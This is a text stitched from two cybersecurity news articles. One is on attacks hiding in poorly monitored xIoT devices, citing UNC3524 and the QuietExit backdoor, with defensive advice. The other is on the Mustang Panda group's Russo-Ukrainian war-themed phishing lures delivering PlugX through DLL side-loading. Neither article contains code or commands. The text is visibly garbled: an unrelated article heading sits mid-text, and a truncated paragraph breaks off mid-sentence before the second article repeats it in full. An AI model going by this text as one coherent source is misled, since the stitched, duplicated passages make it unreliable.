Threat actors who have already breached a corporate IT network through traditional means like phishing may also carry out a second-stage attack on xIoT devices to achieve long-term persistence inside the organization.

One example is the threat actor UNC3524, which Mandiant recently discovered had been installing a backdoor called QuietExit in opaque network appliances and IoT devices like security cameras, remaining undetected on victims' networks for at least 18 months.

xIoT devices are an ideal hiding place for sophisticated adversaries. These devices are poorly monitored, lack anti-malware and intrusion detection coverage, and are not easy to analyze during incident response. My company has found that over 80% of security teams can't even identify the majority of xIoT devices they have in their networks. They also fall into an administrative gray area in terms of who is responsible for managing them (is it the IT team, the security team, the operations team, or the vendor?), which leads to confusion and inaction.

An adversary can easily install a backdoor in any one of these overlooked xIoT devices that will be exceedingly difficult for the security team to detect. The average enterprise has anywhere from tens of thousands to millions of xIoT devices, and typically relies on manual processes for monitoring and maintaining them. Detecting such a backdoor will be like trying to find a needle in an enormous haystack (or haystacks).

**Preventing the Full Range of xIoT Attacks**

In spite of their many risks, xIoT devices can be sufficiently protected without imposing high costs on a company.

Basic measures such as strong password management and keeping firmware up to date will drastically reduce the risk. Accurate inventorying and regular monitoring are also key.

Where companies will be challenged is in terms of the volume of devices they must protect. This is why automation is important, as manually changing passwords and updating firmware on such a vast array of devices isn't feasible for most companies.

3 xIoT Attacks Companies Aren't Prepared For

The China-linked nation-state hacking group referred to as Mustang Panda is using lures related to the ongoing Russo-Ukrainian War to attack entities in Europe and the Asia Pacific.
That's according to the BlackBerry Research and Intelligence Team, which analyzed a RAR archive file titled "Political Guidance for the new EU approach towards Russia.rar." Some of the targeted countries include

Spear Phishing / Cyber Espionage

The China-linked nation-state hacking group referred to as **Mustang Panda** is using lures related to the ongoing Russo-Ukrainian War to attack entities in Europe and the Asia Pacific.

That's according to the BlackBerry Research and Intelligence Team, which analyzed a RAR archive file titled "Political Guidance for the new EU approach towards Russia.rar." Some of the targeted countries include Vietnam, India, Pakistan, Kenya, Turkey, Italy, and Brazil.

Mustang Panda is a prolific cyber-espionage group from China that's also tracked under the names Bronze President, Earth Preta, HoneyMyte, RedDelta, and Red Lich.

It's believed to be active since at least July 2018, per Secureworks' threat profile, although indications are that the threat actor has been targeting entities worldwide as early as 2012.

Mustang Panda is known to heavily rely on sending weaponized attachments via phishing emails to achieve initial infection, with the intrusions eventually leading to the deployment of the PlugX remote access trojan.

However, recent spear-phishing attacks undertaken by the group targeting government, education, and research sectors in the Asia Pacific region have involved custom malware like PUBLOAD, TONEINS, and TONESHELL, suggesting an expansion to its malware arsenal.

The latest findings from BlackBerry show that the core infection process has remained more or less the same, even as Mustang Panda continues to utilize geopolitical events to their advantage, echoing prior reports from Google and Proofpoint.

Contained within the decoy archive is a shortcut to a Microsoft Word file, which leverages DLL side-loading – a technique that was also employed in attacks aimed at Myanmar earlier this year – to kick off the execution of PlugX in memory, before displaying the document's contents.

"Their attack chain remains consistent with the continued use of archive files, shortcut files, malicious loaders, and the use of the PlugX malware, although their delivery setup is usually customized per region/country to lure victims into executing their payloads in the hope of establishing persistence with the intent of espionage," BlackBerry's Dmitry Bestuzhev told The Hacker News.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#intel